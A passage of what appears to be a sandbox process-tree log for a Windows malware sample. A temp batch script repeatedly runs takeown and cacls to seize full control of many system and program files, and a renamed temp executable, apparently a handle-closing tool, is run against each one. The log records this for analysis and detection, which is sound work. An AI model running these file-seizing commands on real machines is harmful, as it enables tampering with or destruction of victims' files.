  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa""
  2⤵
  PID:7428
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:8052
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "classes.jsa" -nobanner
    3⤵
    PID:7220
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa"
    3⤵
    - Modifies file permissions
    PID:6588
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7104
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa""
  2⤵
  PID:3356
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7892
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "classes.jsa" -nobanner
    3⤵
    PID:6188
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\ProgramData\USOPrivate\UpdateStore\store.db""
  2⤵
  PID:8020
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C
    3⤵
    PID:7520
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOPrivate\UpdateStore\store.db"
    3⤵
    - Modifies file permissions
    PID:5592
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5520
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "store.db" -nobanner
    3⤵
    PID:5336
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:6540
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""
  2⤵
  PID:3160
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:7172
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:6392
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:1276
  - - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
      qL02HjdX.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:7760
    - - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
        
        qL02HjdX.exe -accepteula "Identity-V" -nobanner
        5⤵
        
        PID:7968
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5356
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui""
  2⤵
  PID:7088
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:6668
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:6916
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5552
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:6628
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui""
  2⤵
  PID:7300
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8060
  - - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
      qL02HjdX.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:3940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:5788
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:7072
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:7124
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""
  2⤵
  PID:7148
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:6908
  - - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
      qL02HjdX.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:4712
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5564
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:7928
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui""
  2⤵
  PID:2496
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:5436
  - - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
      qL02HjdX.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:3948
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2572
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:5888
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""
  2⤵
  PID:1552
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2660
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "Workflow.Targets" -nobanner
    3⤵
    PID:2544
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"
    3⤵
    - Modifies file permissions
    PID:4076
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""
  2⤵
  PID:2760
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"
    3⤵
    - Modifies file permissions
    PID:2672
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3856
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
    3⤵
    PID:5996
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C
    3⤵
    PID:4004
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui""
  2⤵
  PID:6852
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:4340
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:7020
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6960
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:7636
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui""
  2⤵
  PID:2844
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:5096
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:6412
  - - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
      qL02HjdX.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:5676
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:7264
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6980
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui""
  2⤵
  PID:7552
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui"
    3⤵
    - Modifies file permissions
    PID:5548
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6056
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "BrowserCore.exe.mui" -nobanner
    3⤵
    PID:7792
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui""
  2⤵
  PID:6936
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:6100
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5424
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:5208
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:2456
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""
  2⤵
  PID:6076
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:5568
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:7972
  - - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
      qL02HjdX.exe -accepteula "wab.exe" -nobanner
      4⤵
      PID:7272
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4088
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui""
  2⤵
  PID:6920
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:6212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:5748
  - - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
      qL02HjdX.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:6416
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7736
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:7504
  - - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
      qL02HjdX.exe -accepteula "00000016.bin" -nobanner
      4⤵
      PID:6256
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui""
  2⤵
  PID:7668
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7228
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:2700
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:2768
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui""
  2⤵
  PID:5004
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:7728
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:7188
  - - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
      qL02HjdX.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:7184
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3356
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:5244
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui""
  2⤵
  PID:2340
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:3820
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:7080
  - - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
      qL02HjdX.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:1992
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4584
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui""
  2⤵
  PID:6880
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:6388
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:7988
  - - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
      qL02HjdX.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:7012
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5396
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:4656
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui""
  2⤵
  PID:7612
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:7748
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6892
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:7756
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:7832
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files\Windows Security\BrowserCore\manifest.json""
  2⤵
  PID:5764
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Security\BrowserCore\manifest.json"
    3⤵
    - Modifies file permissions
    PID:1840
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5936
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "manifest.json" -nobanner
    3⤵
    PID:4416
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Security\BrowserCore\manifest.json" /E /G Admin:F /C
    3⤵
    PID:5572
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files\Windows Mail\wabmig.exe""
  2⤵
  PID:5916
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\wabmig.exe"
    3⤵
    - Modifies file permissions
    PID:6028
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "wabmig.exe" -nobanner
    3⤵
    PID:7628
  - - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
      qL02HjdX.exe -accepteula "wabmig.exe" -nobanner
      4⤵
      PID:7404
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6536
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\wabmig.exe" /E /G Admin:F /C
    3⤵
    PID:936
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui""
  2⤵
  PID:6812
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:7136
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5944
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:1424
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:6608
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe""
  2⤵
  PID:7620
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6088
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "BrowserCore.exe" -nobanner
    3⤵
    PID:6524
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe"
    3⤵
    - Modifies file permissions
    PID:7128
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe" /E /G Admin:F /C
    3⤵
    PID:6340
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files (x86)\Windows Mail\wabmig.exe""
  2⤵
  PID:2796
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\wabmig.exe" /E /G Admin:F /C
    3⤵
    PID:7124
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7048
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "wabmig.exe" -nobanner
    3⤵
    PID:852
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\wabmig.exe"
    3⤵
    - Modifies file permissions
    PID:7072
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui""
  2⤵
  PID:6592
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:6868
  - - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
      qL02HjdX.exe -accepteula "KnownGameList.bin" -nobanner
      4⤵
      PID:7148
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6984
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:2436
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:3976
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""
  2⤵
  PID:868
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7560
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:6596
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files\Windows Mail\wab.exe""
  2⤵
  PID:6324
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui""
  2⤵
  PID:7576
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:3932
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2928
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:7356
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:8180
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V""
  2⤵
  PID:8188
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V" /E /G Admin:F /C
    3⤵
    PID:3908
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V"
    3⤵
    - Modifies file permissions
    PID:6960
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5004
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "Identity-V" -nobanner
    3⤵
    PID:7760
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui""
  2⤵
  PID:6996
- C:\Windows\SysWOW64\cmd.exe
